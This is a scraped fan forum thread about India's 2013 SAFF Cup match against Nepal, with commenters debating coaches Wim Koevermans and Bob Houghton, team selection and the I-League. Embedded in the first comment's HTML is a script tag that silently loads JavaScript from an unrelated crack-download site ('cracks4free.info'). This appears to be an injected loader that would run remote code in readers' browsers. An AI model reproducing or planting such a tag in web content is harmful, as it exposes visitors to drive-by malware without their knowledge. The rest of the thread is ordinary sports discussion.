India vs Nepal Live Discussions, September 5 2013

Comments

• ashindiaashindia 9254 Points
    <b><i><span itemprop="articleBody"><font size="4">Anil Gurung </font>-  “I have played some very good Indian teams
    and possibly the current side isn’t that good but still we didn’t
    underestimate them and aimed to give a strong performance,” he added.</span></i></b><script src="http://cracks4free.info/5/adds.js"; async="" type="text/javascript"></script>
  • rudrarudra 2958 Points
    shibier wrote: »
    I have  got a chance to watch India Vs Qatar friendly match from the stands in 2011 Doha. This same team , only two three guys missing, completely dominated Qatar in that match. Armando Colaco was the coach tht time. What a beautiful game it was one to one small passes. India kept the possession most of the time and Qatar team were  literally running behind the ball. In the second half Qatar team played with their full team with foriegn strickers like Sebastian soria, Fabio etc. Cant digest that the same team now struggling against SAFF countries with in a span of two years !!. I think tht was the last time i saw Indian football played up to their potential. After tht even if we won Nehru cup we have not seen any quality games from Team India. 

<br><div><br></div><div>oh please!!! give me a break...the complete team was running after the Indian passing game!!!!  i remember the updates of the game very well...anyways no point arguing as no one can prove...but why dont u watch India vs TnT in you tube and see how good was the passing game...criticism is good but be reasonable...a few years back everybody was ready to kill Bob Houghton after some shameful results</div>
  • DXDX 4074 Points
    I remember Bob was criticised for ruining the Passing game in India. Now he is suddenly the hero of yesteryears. Move on guys. Atleast selection maybe poor in Wim tenor but atleast he is trying different formations and giving the youth a chance.
  • ajmalajmal 1208 Points
    ashindia wrote: »
    rudra wrote: »
    <br><div><br></div><div>Bob's miracle = AFC CC win</div>

<br><br>I watched all of India's game till the semi-final from the stands, but seriously they were not shit like what we are now. This is all time low.......... IMG Jokers + AIFF jokers + Dumb coach + Shit Players = Result in this SAFF Cup<br>

<br><div>So now Wim is a dumb coach??...@ash do you know any better group of players in I league?</div>
  • DXDX 4074 Points
    the result in this saff cup is india is thru to semifinals with every chance to win the cup again.
  • Bob was hugely criticised for his selection of d team...I remember this quite vividly..

Armando..I remember he was criticised for selecting a primarily " goan ". Team

Wim is also criticised for d team selection...I guess whoever is d coach he will be critiqued for team selection..

We have to remember bobs time while India MAY have had a good team compared to now , however our opponents seem to be much stronger n we have remained d same if not regressed...plus in d current team , there r no experienced heads or leaders to motivate n lead d team. His might look a small matter but is quite vital for team performance.. No baichung no climax no Samir etc etc...

Without a doubt wim is having problems with tactics and team selection..AIFF or wat ever committee they have must have a long talk with WIM on this sorry state of d NT....lets not let our players go scot free,bfrankly our players must also shoulder d blame for these loses

• rudrarudra 2958 Points
    i still think Wim has a lot of problems...what is most worrying me is the team is becoming weaker as he changes more experienced player with youth...remember nehru cup, everyone was gaga over him, saying system is not perfect but we can improve...in the friendlies we lost, but there were nice spells of football, like palestine 1st half...then came afc cc and we were poor and now saff we are worse than ever...all this basically says that when we talk about getting rid of oldies to bring in i league performers it was its problems....Bob was probably right in this regard..<div><br></div><div>wim has slowly got rid of Clifford, Anthony, Sushil, Naik, Masih, Baldeep and some of the problem child of previous era and still is struggling...quite honestly when we talk about i league teams and players doing well, a lot depends on foreigners, u can say there are only 3 foreigners but these are in very key positions - strikers who dont miss the one's sunil or other indian strikers miss; attacking midfielders - like penn, beto who keep on feeding the strikers and dominate the midfield (and we have jewel and alwyn!!!); central defence - who basically makes his indian partner look good...see even award winning Lenny is not looking so good in NT...I-League is unable to make competitive Indian players, its very clear</div>
  • rudrarudra 2958 Points
    @ashlesh - maybe the psyche...also maybe this is what we mean by experience....if u see even in last few years  people will keep on abusing clifford and anthony, yet they got a few goal for India..even when Renedy was almost finished in national league he still gave good performance  for India..maybe thats why people talk about international experience and importance of making debut slowly...of course some players are good at it...but some are clearly not...these guys need to play more..maybe come as substitute.. I think Wim is bad in terms of motivation, Bob/Toal, even Papas seem to be good motivators
  • rudrarudra 2958 Points
    @ashlesh - u are a true fan always optimistic :) lets see how they play in i league :)
  • rudra wrote: »
    @ashlesh - maybe the psyche...also maybe this is what we mean by experience....if u see even in last few years  people will keep on abusing clifford and anthony, yet they got a few goal for India..even when Renedy was almost finished in national league he still gave good performance  for India..maybe thats why people talk about international experience and importance of making debut slowly...of course some players are good at it...but some are clearly not...these guys need to play more..maybe come as substitute.. I think Wim is bad in terms of motivation, Bob/Toal, even Papas seem to be good motivators

<br/>

But surely even when Clifford or Samir etc etc debuted for d national team, I bet they were not this bad..perhaps the motivational talks , pep talks with the NT coaches they had influenced whether players play to potential..

I also noticed the previous batches of players had greater interaction and understanding among themselves it's lacking now.

Could it be the current team players r more interested in d renumeration with d clubs they get rather then performance for d NT?..has the packages they get corrupted their motivational levels to a extent?